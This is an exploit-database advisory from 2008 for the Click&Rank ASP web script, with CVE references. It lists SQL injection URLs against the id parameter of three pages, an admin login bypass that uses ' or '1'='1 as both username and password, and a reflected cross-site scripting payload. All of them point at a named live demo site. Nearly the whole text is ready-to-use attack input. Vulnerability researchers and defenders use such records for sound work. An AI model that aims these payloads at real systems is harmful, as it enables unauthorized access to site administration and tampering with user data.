Click&Rank - SQL Injection / Cross-Site Scripting

Author: AlpHaNiX
type: webapps
platform: asp
port: 
date_added: 2008-12-14  
date_updated:   
verified: 1  
codes: OSVDB-50820;CVE-2008-5889;OSVDB-50819;OSVDB-50817;OSVDB-50816;OSVDB-50815;CVE-2008-5888  
tags:   
aliases:   
screenshot_url:   
application_url:   

raw file: 7486.txt  
###########################################################################
#-------------------------------AlpHaNiX----------------------------------#
###########################################################################

#Found By : AlpHaNiX
#website  : www.offensivetrack.org
#contact  : AlpHa[AT]HACKER[DOT]BZ

###########################################################################

#script   : Click&Rank
#download : null
#Demo     :  http://www.icash.ch/index.html?ClickAndRank/default.asp

###########################################################################

#Exploits :

--=[SQL INJECTION]=--
http://www.icash.ch/index.html?ClickAndRank/hitcounter.asp?id=(SQL)
http://www.icash.ch/index.html?ClickAndRank/user_delete.asp?id=(SQL)
http://www.icash.ch/index.html?ClickAndRank/user_update.asp?id=(SQL)

##########################################################################

--=[AUTH BYPASS]=--

http://www.icash.ch/index.html?ClickAndRank/admin.asp

USERNAME  : ' or '1'='1
PASSWORD : ' or '1'='1


##########################################################################

--=[Cross Site Scripting]=--

http://www.icash.ch/index.html?ClickAndRank/user.asp?action=%22%3E%3Cscript%3Ealert(1);%3C/script%3E



#Greetz For My Best Friend ZIGMA

###########################################################################

# milw0rm.com [2008-12-15]